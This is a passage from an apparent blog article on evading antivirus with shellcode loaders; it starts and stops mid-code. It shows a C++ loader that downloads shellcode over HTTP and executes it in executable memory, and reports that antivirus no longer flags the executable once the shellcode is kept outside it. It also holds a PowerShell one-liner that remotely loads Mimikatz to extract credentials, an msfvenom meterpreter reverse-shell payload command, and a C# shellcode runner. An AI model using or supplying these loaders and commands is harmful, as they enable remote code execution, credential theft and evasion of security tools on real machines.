                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Error %u in WinHttpQueryDataAvailable.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Out of memory&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;

            &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;WinHttpReadData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwDownloaded&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Error %u in WinHttpReadData.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"ok"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;code_length&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;strlen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;calloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;code_length&lt;/span&gt;  &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;code_length&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
                &lt;span class="n"&gt;sscanf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%2hhx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
                &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;memcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;ShellCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)())&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
            &lt;span class="k"&gt;delete&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;dwDownloaded&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;WinHttpCloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"pause"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8b2006bftwz53xqpjurj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8b2006bftwz53xqpjurj.png" alt="Figure 4: HTTP-based shellcode retrieval implementation" width="800" height="524"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 4: HTTP-based shellcode retrieval implementation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Examining the detection results: after the embedded shellcode is removed, the antivirus solution no longer flags the executable.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fj0g5gy93z2jplzdhxfgg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fj0g5gy93z2jplzdhxfgg.png" alt="Figure 5: Detection results after shellcode separation" width="800" height="268"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 5: Detection results after shellcode separation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Numerous similar remote-loading techniques exist, such as PowerShell in-memory loading—a method with which many practitioners are undoubtedly familiar.&lt;/p&gt;

&lt;p&gt;For instance, PowerShell can be used to remotely load Mimikatz for credential extraction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;IEX&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;New-Object&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Net.WebClient&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;DownloadString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Invoke-Mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;c:\1.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fe7wh19kzyccqh3v9v340.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fe7wh19kzyccqh3v9v340.png" alt="Figure 6: PowerShell remote loading example" width="800" height="269"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 6: PowerShell remote loading example
  &lt;p&gt;&lt;/p&gt;




&lt;p&gt;While many such techniques are widely used, certain in-memory loading methods are still intercepted by some antivirus solutions. We shall address this issue later in the article.&lt;/p&gt;

&lt;p&gt;At this juncture, the underlying principle of language-based loaders should be self-evident. Nonetheless, I shall offer an explanation, drawing upon my colleague's analogy:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Shellcode is analogous to water; a loader serves as the vessel that contains it. Just as water must be poured into a cup before it can be consumed, shellcode must be loaded by a loader before it can be executed.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  A) Loaders for Executing Shellcode
&lt;/h3&gt;

&lt;h4&gt;
  
  
  SSI (Shellcode String Injection):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfvenom &lt;span class="nt"&gt;-a&lt;/span&gt; x86 &lt;span class="nt"&gt;--platform&lt;/span&gt; Windows &lt;span class="nt"&gt;-p&lt;/span&gt; windows/meterpreter/reverse_tcp &lt;span class="nv"&gt;LHOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;192.168.174.142 &lt;span class="nv"&gt;LPORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4444 &lt;span class="nt"&gt;-f&lt;/span&gt; c &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; msf.txt
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of c file: 1457 bytes
&lt;span class="nb"&gt;cat &lt;/span&gt;msf.txt|grep &lt;span class="nt"&gt;-v&lt;/span&gt; unsigned|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\"\\\x&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\\\x&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;//g"&lt;/span&gt;|sed &lt;span class="s1"&gt;':a;N;$!ba;s/\n//g'&lt;/span&gt;|sed &lt;span class="s2"&gt;"s/;//g"&lt;/span&gt;

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
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgu0heke688vy7xu64ijn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fgu0heke688vy7xu64ijn.png" alt="Figure 7: MSFVenom shellcode generation output" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 7: MSFVenom shellcode generation output
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8v8o3aieo73v7tkjvkq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fc8v8o3aieo73v7tkjvkq.png" alt="Figure 8: SSI loader execution example" width="799" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 8: SSI loader execution example
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Shellcode Launcher:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fujm7d3rc9g1i8v7agraz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fujm7d3rc9g1i8v7agraz.png" alt="Figure 9: Shellcode Launcher tool interface" width="800" height="237"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 9: Shellcode Launcher tool interface
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  C# Loader:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;TCPMeterpreterProcess&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// native function's compiled code&lt;/span&gt;
            &lt;span class="c1"&gt;// generated with metasploit&lt;/span&gt;
            &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;333&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;

            &lt;span class="p"&gt;};&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;Marshal&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Copy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;// prepare data&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;// execute native code&lt;/span&gt;
            &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0xFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flAllocationType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flProtect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;VirtualFree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;lpAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
